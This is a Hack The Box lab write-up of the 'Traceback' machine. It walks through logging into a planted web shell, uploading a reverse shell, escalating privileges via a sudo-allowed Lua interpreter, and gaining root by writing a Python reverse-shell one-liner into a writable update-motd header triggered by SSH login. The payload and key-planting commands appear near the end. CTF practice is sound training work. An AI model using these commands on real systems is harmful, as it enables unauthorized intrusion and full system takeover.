Traceback — Hack The Box Writeup

Traceback was a fun and exciting challenge box. A unique way to get root and as always, I learnt new things while attempting the challenge.

Summary

  • Login to attackers’ web shells
  • Upload and execute php reverse shell
  • Get to “sysadmin” user via scripting language Lua
  • Get root via manipulated ssh banner file and ssh login/connection.

Foothold

nmap -sC -sV -oA traceback 10.10.10.181
Nmap scan result

Ports 80 and 22 are open which run HTTP and ssh respectively, therefore we head over to port 80 to see what’s running on the webserver.

Website’s Homepage

Okay, the website has been hacked. “CTRL-U”, to view the source code and there’s nothing of interest except this little piece of information:

source code

This means that the attacker(s) must have a way of gaining unauthorized access to the site and they were kind enough to let us also have access 😏. But how do we find this backdoor/unauthorized access? Notice the Xh4H in the source code picture, that seems like a name so we just google it. Following the link, it leads to a tweet about a Github repository of collection of web shells. https://github.com/TheBinitGhimire/Web-ShellsSome of the best web shells that you might need”.

google search result(LEFT). Tweet about github repo (RIGHT)

Webshell: A web shell is a malicious program that when uploaded to a web server, gives attackers remote access to the web server’s
file system, directories, files etc.

So, we need to find out which web shell in the github repo the attacker (Xh4h) uploaded. We Make a list with all the web shells
in the repository and use the list as our bruteforce list with gobuster (web file/directory bruteforce tool).

brute force list(LEFT) gobuster result(RIGHT)

Good, we’ve found a directory. On visiting the path, we are presented with a login page, well I just guessed admin:admin as credentials and it worked,
we are logged into the web shell and now we have access to the server’s filesystem.

web shell’s login page(LEFT) web shell’s interface(RIGHT)

Well, you can immediately start using the web shell to traverse directories and find more files, but I wanted a command-line interface so I uploaded a
reverse shell, set up my listener and got a connection.

User

webadmin’s the home directory

there’s a note from the sysadmin user talking about a tool to practice Lua (programming language). Also if you notice we have read and write permissions(-rw) on the “.bash_history” file (Always check if you can read the .bash_history file for any user).

.bash_history file

So basically, the “bash_history” file contains the history of executed commands. In this particular file, we see the command:

sudo -u sysadmin /home/sysadmin/luvit privesc.lua

which means that the tool luvit is used to execute the file privesc.lua on behalf of the sysadmin user (sudo -u sysadmin). But immediately, the file is removed (rm privesc.lua). Hmmm, remember the note.txt, So we just create a lua file with the following command:

touch myfile.lua

Then I googled “lua linux privilege escalation”, followed the first link which led to gtfobins (a nice resource for checking unix binaries that are exploitable). And then ran the following command to put the ‘os.execute(“/bin/sh”)’ command into myfile.lua:

echo “os.execute(\"/bin/sh\")” >> myfile.lua

Finally, we execute the command:

sudo -u sysadmin /home/sysadmin/luvit myfile.lua

Boom!! We are now the sysadmin user and we can read the user flag.

sysadmin flag

Root

pspy’s output

To transfer pspy or any file to a machine, you start a python http server on your own machine
python3 -m http.server

It listens on port 8000 by default.
Then on the victim’s machine/hackthebox machine, go to a writable directory preferrably /tmp
and run:
wget http://YOUR-IP:8000/THE-FILE-YOU-WANT-TO-TRANSFER

Back to pspy’s output. What the command does is to copy every file in the “/var/backups/.update-motd.d/” directory to the “/etc/update-motd.d/
directory. And this command executes every 30 seconds (sleep 30). In the “/var/backups/.update-motd.d/” directory there is a bunch
of files but there’s nothing we can do because the files are owned by root and we (sysadmin) have only read permissions. Going over to the
/etc/update-motd.d/” directory, we see the same files as the previous directory but now we have both read and write access to the files.

/etc/update-motd.d/ directory

After much assessment and trying to understand what the files are, the “00-header” file becomes of more importance because we see our hackers name(Xh4H) in it. What this file does is to
describe/print the operating system release/version and execute any commands in it whenever a login (via ssh) is made to the linux server (this box).

contents of the 00-header file

Recall we have write permissions to this file, so what I did was copy a python reverse shell into the “00-header” file, generate ssh keys on my system for the box, transfer the public key to the box, add it to the “authorized_keys” file for the “sysadmin” user, setup my netcat listener, and then try to ssh into the box from my system.

1) ssh-keygen -t rsa (passphrase required, i used "password")
i) Tranfer public key using method described above to transfer pspy
2) cat id_rsa.pub >> /home/sysadmin/.ssh/authorized_keys3) echo python3 -c "'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP-HERE\",PORT-HERE));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" >> 00-header4) nc -nlvp 80085) ssh -i id_rsa sysadmin@10.10.10.181

Remember the command runs every 30 seconds, so all the above commands have to be run before 30 seconds especially from command no.(4) and,
Boom!! we get a connection, and we are now the root user.

root user

CTF | All things Security😉